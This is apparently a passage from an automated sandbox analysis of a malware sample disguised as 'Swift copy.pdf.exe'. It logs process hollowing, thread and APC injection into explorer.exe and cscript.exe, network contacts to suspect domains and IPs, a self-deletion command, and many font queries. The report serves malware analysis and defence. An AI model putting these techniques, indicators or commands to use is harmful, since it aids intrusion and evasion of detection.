          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04939240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04947E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0497927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04948794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04941B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04941B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04964BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0495F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04934F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04934F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04963B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04963B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0494FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Domain query: www.agenciaorange.net
          Source: C:\Windows\explorer.exe; Domain query: www.lehoachi.com
          Source: C:\Windows\explorer.exe; Network Connect: 204.11.56.48 80
          Source: C:\Windows\explorer.exe; Network Connect: 74.208.236.87 80
          Source: C:\Windows\explorer.exe; Domain query: www.technomark.xyz
          Source: C:\Windows\explorer.exe; Domain query: www.wapgoals.com
          Source: C:\Windows\explorer.exe; Network Connect: 174.136.25.55 80
          Source: C:\Windows\explorer.exe; Network Connect: 45.33.51.100 80
          Source: C:\Windows\explorer.exe; Domain query: www.rileysboutique.com
          Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe; Network Connect: 51.222.80.112 80
          Source: C:\Windows\explorer.exe; Domain query: www.stepmed.life
          Source: C:\Windows\explorer.exe; Domain query: www.indiafoodtraveling.com
          Source: C:\Windows\explorer.exe; Network Connect: 5.101.123.53 80
          Source: C:\Windows\explorer.exe; Domain query: www.criticalredux.com
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Memory written: C:\Users\user\Desktop\Swift copy.pdf.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\cscript.exe; Thread register set: target process: 3440
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 30000
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Process created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Process created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Windows\SysWOW64\cscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmp; Binary or memory string: &Program Manager
          Source: explorer.exe, 00000007.00000002.592968697.0000000000EE0000.00000002.00000001.sdmp, cscript.exe, 0000000A.00000002.593147820.0000000003500000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Users\user\Desktop\Swift copy.pdf.exe VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe; Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
